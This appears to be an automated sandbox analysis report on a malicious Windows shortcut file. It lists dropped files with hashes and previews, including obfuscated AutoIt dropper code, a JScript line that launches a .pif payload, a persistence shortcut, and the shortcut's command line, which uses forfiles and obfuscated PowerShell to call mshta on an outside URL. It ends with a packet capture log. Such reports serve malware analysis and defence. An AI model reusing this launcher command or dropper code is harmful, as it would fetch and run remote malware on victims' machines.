                                                                                                                                                                                                                  MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                  SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                  SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                  SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):122218
                                                                                                                                                                                                                  Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                  MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                  SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                  SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                  SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):130866
                                                                                                                                                                                                                  Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                  MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                  SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                  SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                  SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1266)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1240100
                                                                                                                                                                                                                  Entropy (8bit):5.144277296271024
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12288:D8V+jcfSgyuH7Kixj+UXk8pL6OvsEmeXBWD4LkPq0e718m3UDd:DcB7HxicaEmEQD3I1jUZ
                                                                                                                                                                                                                  MD5:078A35D34863F9421F702C3044DA8A1F
                                                                                                                                                                                                                  SHA1:1D34A5EF73992231F1E5857A462359596647E0F6
                                                                                                                                                                                                                  SHA-256:6E32AE2A7776564163BE157BAEE93FCB156A5030D620C71D9FCF33D9A7CBC925
                                                                                                                                                                                                                  SHA-512:67EEB87AEE2567513FC6D5AE241E62D73874980EC18BB77C46DF4191A2EC64A6DB1200F7541B0F6E908B66D39ACE1D483CD1E33E90C165A6DBA01C35536E1541
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                                                                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):190
                                                                                                                                                                                                                  Entropy (8bit):4.702878525317735
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:RiMIpGXfeNH5E5wWAX+eLCMuL4EkD5yKXW/Zi+0/RaMl85uWAX+eLCMuL4EkD5yn:RiJbNHCwWDeLPqJkDrXW/Zz0tl8wWDek
                                                                                                                                                                                                                  MD5:ADD89CDE8D0D8247BA4058565F6AF1D1
                                                                                                                                                                                                                  SHA1:BDE05EE487B598FC744EBE571202C8BDED415560
                                                                                                                                                                                                                  SHA-256:49456CC7BEEF073EF45D3F3CA43AFFFB39A1885C386F8C24C29A7F3AA86A19AB
                                                                                                                                                                                                                  SHA-512:15E9AB5071BB27D81BC6356AEA39BBD4F07C554E25B1984BE524DDDC86DC861950F5E18237D33A56A2397E30D700BFF22B338CE4F9B596A0F5BDD600A2F6E3DA
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                                                                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):893608
                                                                                                                                                                                                                  Entropy (8bit):6.62028134425878
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                                                                                                                  MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                                                                  SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                                                                                                                  SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                                                                                                                  SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):101
                                                                                                                                                                                                                  Entropy (8bit):4.882484479599994
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:HRAbABGQaFyw3pYoN+E2J5yKXW/Zi+URAAy:HRYF5yjoN723yKXW/Zzyy
                                                                                                                                                                                                                  MD5:E13AD229D874CB584EE9C5EAF00F02A5
                                                                                                                                                                                                                  SHA1:99EFF6F0EFC61DCFDD83E19A7A88355E8D82BF77
                                                                                                                                                                                                                  SHA-256:7448CB3A6A286F6BDF4F036DEAB44060B5E1E17368D2E1C560CCA5EEFEF342A1
                                                                                                                                                                                                                  SHA-512:DB00B1447019348D5D90A1BD0A5E30FF60D0ED92E3308418B659D7B8B5796A04D4CF371D6824574E84F1ACB8D1CFC193E4B7F8EC3EE93862FF6F4C01012BD801
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1200x800, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):163840
                                                                                                                                                                                                                  Entropy (8bit):7.998819356575957
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:3072:H7Uxsy3eSeT4buEoFmO7f4duw1G4J3ZEssmwDLwUeiwaODY:H7byuSeTYCXQdDhwDL3NLOs
                                                                                                                                                                                                                  MD5:0CECA59F492AF57C4F259F23B61A5DE8
                                                                                                                                                                                                                  SHA1:31AAF693A5EBFA6776D174CA8317F4AE3B962C5D
                                                                                                                                                                                                                  SHA-256:9FCE36F9079249E80B733AA5C9180F024027C5774CA55E89742A2CDBF88CFAE1
                                                                                                                                                                                                                  SHA-512:4796A025492188D74D93335DCCE299EB2F205344A82266B7A9EF7F29D797CFB84E024304730BEEEFAD22E7980943D98567B0FFA182E5B626D8C39712C043A711
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1083904
                                                                                                                                                                                                                  Entropy (8bit):6.306473619816267
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24576:DrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaB1T:D2EYTb8atv1orq+pEiSDTj1VyvBa3
                                                                                                                                                                                                                  MD5:567DE19C0E7E3A1FC845E51AC1C1D5D8
                                                                                                                                                                                                                  SHA1:4C4FDEA73E0C98C2C82B6B1232EF7ECF5B99CCD1
                                                                                                                                                                                                                  SHA-256:F1140750BA9FEAD0EF27B715D1BB2AE28864FE611068759F8EF4F8364AF559CB
                                                                                                                                                                                                                  SHA-512:84C3A61A1F7A71E52DFE110CD975F6DA7EA0B2A83FA16F7B46C223ADE7B44D1F299BF0C108268502F144F5C93E0A74AB37B13D24B9540355658119768BF12C2A
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 08:09:57 2019, mtime=Sun Dec 15 15:18:48 2024, atime=Sat Dec 7 08:09:57 2019, length=41472, window=hidenormalshowminimized
Entropy (8bit):4.631686127467723
TrID:
• Windows Shortcut (20020/1) 100.00%
File name:R4qP4YM0QX.lnk
File size:1'156 bytes
MD5:c994e4260593f7a34502021234dae6a9
SHA1:79ce5393d4fa09d39588aca57653b65e46bceb3b
SHA256:f87591ca3e590371796ced4bd9df58da5dc7822faae2520886470d1307b69db9
SHA512:9d109c61d3d140ffa7d5d09ec6b9de5d4a05ea48d46f95f6dfbe21fc998abe9ac4b6ec1273308ab6ea58b8a374fd86bf3ac03ba40b3379c090cc4ac363e18c52
SSDEEP:24:8UY3PWNpyAMkR+/4W+4MlEPSL6WaFacabqyI+pu4m:8j3uK/MlEQ6W+acaey3w4
TLSH:7921CE0813DA1B74C376AE3E682AF311C9713C4AEC678F1E059016885499111B8A6FBA
File Content Preview:L..................F.... ................O..................................E....P.O. .:i.....+00.../C:\...................V.1......YI...Windows.@........OwH.Yz|....(.....................R3..W.i.n.d.o.w.s.....Z.1......Y....System32..B........OwH.Ya.......
Icon Hash:74f0e4e4e4e1e1ed

General

Relative Path:..\..\..\..\..\Windows\System32\forfiles.exe
Command Line Argument:/p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH
Icon location:shell32.dll
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                  Dec 18, 2024 21:06:02.976866961 CET44349716147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:02.976892948 CET49716443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:02.976907969 CET49716443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:02.977003098 CET44349716147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:02.977046967 CET49716443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:02.977071047 CET49716443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:02.977087021 CET44349716147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:05.458121061 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:05.458159924 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:05.458221912 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:05.470163107 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:05.470190048 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:06.976924896 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:06.977044106 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:06.978359938 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:06.978389025 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:06.979366064 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:06.985977888 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.027343035 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.406058073 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.406121016 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.406183958 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.409353018 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.409379005 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.591481924 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.639210939 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.680722952 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.680783987 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.680850983 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.681324959 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.681344986 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.777936935 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.777987003 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.778067112 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.783850908 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.783886909 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.783943892 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.783943892 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.783968925 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.784010887 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.784010887 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.784049988 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.784084082 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.784116983 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.784116983 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.784145117 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.789313078 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.789325953 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.836901903 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.836930037 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.837032080 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.837102890 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.837296963 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.847724915 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.847786903 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.847851038 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.848663092 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.848691940 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.993293047 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.993319988 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.993383884 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.993406057 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:07.993464947 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.017998934 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.018023968 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.018064022 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.018075943 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.018121958 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.042707920 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.042738914 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.042812109 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.042840958 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.042879105 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.042896032 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.168277025 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.168309927 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.168351889 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.168370008 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.168395042 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.168414116 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.189167976 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.189184904 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.189239979 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.189246893 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.189302921 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.211782932 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.211800098 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.211860895 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.211867094 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.211908102 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.230787039 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.230803013 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.230859041 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.230865002 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.230896950 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.242943048 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.242959023 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.243010044 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.243016005 CET44349724147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:08.243069887 CET49724443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.272597075 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.272619963 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.272706985 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:10.272778988 CET44349731150.171.28.10192.168.2.6
